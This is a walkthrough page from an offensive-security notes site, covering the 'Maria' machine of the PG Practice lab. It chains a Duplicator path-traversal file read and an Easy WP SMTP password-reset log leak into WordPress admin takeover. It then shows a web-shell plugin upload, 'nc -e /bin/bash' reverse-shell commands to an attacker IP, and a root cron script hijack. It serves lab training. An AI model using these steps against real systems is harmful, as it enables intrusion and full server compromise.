OffSec Notes
  • Offensive Security Notes
    • Linux/Unix
      • Checklist - PrivEsc
        • Related Links
        • Kernel Exploits
        • MYSQL
          • HEX
        • SUID
        • Relative Path in SUID Program
        • Writable /etc/passwd file
        • Writable script in /etc/crontab
        • Writable services
        • Sudo <=1.8.14
        • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
        • Docker
          • Docker Escape
        • davfs2
        • gcore
        • fail2ban
        • git
        • tar with wildcard
        • Exiftool
      • Limited Shell Escape
      • Wordpress
      • Apache Tomcat
      • Werkzeug Console PIN bypass
        • get_flask_pin.py
      • Java Object Deserialization
      • Redis RCE
      • mongodb
      • Postgres
      • Erlang - 4369
      • rsync - 873
      • Sendmail ClamAV
      • VNC Password Decryptor
    • Windows
      • Checklist - PrivEsc
        • MSSQL
        • PsExec.exe
        • Build Exploits
        • Unquoted Service Paths
        • SeImpersonateToken
        • SeRestorePrivilege
        • SeBackupPrivilege
        • Abuse GPO
        • Job with editable file
        • AlwaysInstallElevated
        • Misconfigured LDAP
        • GMSA
        • MS17-010
      • Useful PS Scripts
        • GetUserSPNs.ps1
        • Master MDF Hash Extraction
        • Spray-Passwords.ps1
      • Password Extraction
      • Office Macro
        • Microsoft Office
        • Open Office
      • Post Exploitation
    • Web
      • SQL Injection
        • mongodb 2.2.3
        • UNION BASED
          • MSSQL
          • Oracle
        • ERROR BASED
        • node.js
    • Nmap samples
    • Shells
      • node.js
      • msfvenom samples
      • Reverse Shells
      • Shellter
    • Enumeration
      • SMB
      • RPC
      • LDAP
    • Buffer Overflow
      • mona
      • fuzzer.py
      • exploit.py
      • bytearray.py
      • pattern_offset.rb
      • pattern_create.rb
    • Password Cracking
    • File Download
      • FTP
    • Port Forwarding
      • Dynamic Forwarding
    • Useful links
  • Blog
    • CRTO I & II
    • OSCP Preparation
    • New OSCP Exam vs Previous OSCP Exam
    • Movements in AD
    • PWK Lab vs PG Practice
  • PortSwigger Academy
    • Server-side topics
      • Authentication vulnerabilities
      • OS Command Injection
      • File Path Traversal
      • Business logic vulnerabilities
      • Information disclosure vulnerabilities
      • Access control vulnerabilities and privilege escalation
      • File upload vulnerabilities
      • Server-side request forgery (SSRF)
      • XML external entity (XXE) injection
    • Client-side topics
      • Cross-site scripting
      • Cross-origin resource sharing (CORS)
      • Cross-site request forgery (CSRF)
      • Clickjacking (UI redressing)
      • DOM-based vulnerabilities
      • Testing for WebSockets security vulnerabilities
    • Advanced topics
      • Insecure deserialization
      • Server-side template injection
      • Web cache poisoning
      • HTTP Host header attacks
      • HTTP request smuggling
      • OAuth 2.0 authentication vulnerabilities
      • JWT attacks
  • Walkthroughs
    • PG Practice
      • Linux
        • WARM UP
          • Bratarina
          • ClamAV
          • Exfiltrated
          • Hawat
          • Interface
          • Muddy
          • Pebbles
          • Twiggy
          • Wombo
        • GET TO WORK
          • Banzai
          • Cassios
          • Dibble
          • Fail
          • G00g
          • Hetemit
          • Hunit
          • Maria
          • Nappa
          • Nibbels
          • Nukem
          • Payday
          • Pelican
          • Readys
          • Roquefort
          • Snookums
          • Sorcerer
          • Splodge
          • Sybaris
          • Walla
          • Webcal
          • XposedAPI
          • ZenPhoto
          • Zino
          • QuackerJack
        • TRY HARDER
          • Clyde
          • Peppo
          • Sirol
      • Windows
        • WARM UP
          • Algernon
          • Compromised
          • Helpdesk
          • Internal
          • Kevin
          • Metallus
        • GET TO WORK
          • AuthBy
          • Billyboss
          • Craft
          • Fish
          • Hutch
          • Jacko
          • Nickel
          • Shenzi
          • Slort
        • TRY HARDER
          • Heist
          • Meathead
          • Vault
      • Template
  • About the author
Powered by GitBook
On this page
  • Enumeration
  • Initial Access
  • PrivEsc
  1. Walkthroughs
  2. PG Practice
  3. Linux
  4. GET TO WORK

Maria

Enumeration

21/tcp    open   ftp       vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    5 0        0            4096 Sep 21  2018 automysqlbackup
80/tcp    open   http      Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Maria
3306/tcp  open   mysql     MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
$ wpscan --url http://192.168.153.167/ --api-token [REDACTED]

[+] WordPress version 5.7.1 identified
[I] duplicator v1.3.26
[I] easy-wp-smtp v1.4.1
$ searchsploit wordpress easy wp smtp
Unpatched WordPress Easy WP SMTP installs version 1.4.2 or earlier. - Sensitive Data Exposure

$ searchsploit wordpress duplicator
Wordpress Plugin Duplicator 1.3.26 - Unauthentica | php/webapps/49288.rb
Exploit: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)
EASY WP SMTP - https://www.exploit-db.com/exploits/50420
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
> set FILEPATH /etc/default/automysqlbackup

# Username to access the MySQL server e.g. dbuser
USERNAME=backup

# Username to access the MySQL server e.g. password
PASSWORD=[REDACTED]

# Host name (or IP address) of MySQL server e.g localhost
DBHOST=localhost
$ mysql --host=192.168.153.167 -u backup -p

MariaDB [wordpress]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$[REDACTED]                      |
+------------+------------------------------------+
1 row in set (0.145 sec)

I could not crack the password with rockyou.

With the other exploit, we can use mysql to identfiy the log file to get admin reset link.

Wordpress -> Forgot password -> admin

MariaDB [wordpress]> select option_value from wp_options where option_name = 'swpsmtp_options';
...
"enable_debug";i:1
"log_file_name";s:27:"618690b555268_debug_log.txt";}
> set FILEPATH /var/www/html/wordpress/wp-content/plugins/easy-wp-smtp/618690b555268_debug_log.txt

CLIENT -> SERVER: http://192.168.117.167/wp-login.php?action=rp&key=IRYLUQIp7Pl9LHhLkdbr&login=admin

Open the link, reset the admin password. Then login with new password.

Initial Access

$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ sudo zip plugin-shell.zip plugin-shell.php

Plugins -> Add New -> Upload Plugin -> Browse -> plugin-shell.zip -> Install Now

http://192.168.117.167/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=nc%20-e%20/bin/bash%20192.168.49.117%2080

PrivEsc

/etc/cron.d/automysqlbackup

www-data@maria:/var/mail$ cat /etc/cron.d/automysqlbackup
*/1 * * * * root /usr/sbin/automysqlbackup


cat /etc/default/automysqlbackup
# Command run after backups (uncomment to use)
POSTBACKUP=/var/www/html/wordpress/backup_scripts/backup-post
cat << EOF > /var/www/html/wordpress/backup_scripts/backup-post              
> /bin/bash -c '/usr/bin/nc -e /bin/bash 192.168.49.117 80'
> EOF

chmod +x /var/www/html/wordpress/backup_scripts/backup-post
PreviousHunitNextNappa

Last updated 3 years ago

https://www.howtoforge.com/creating-mysql-backups-with-automysqlbackup-on-ubuntu-9.10
https://www.zdnet.com/article/zero-day-in-wordpress-smtp-plugin-abused-to-reset-admin-account-passwords/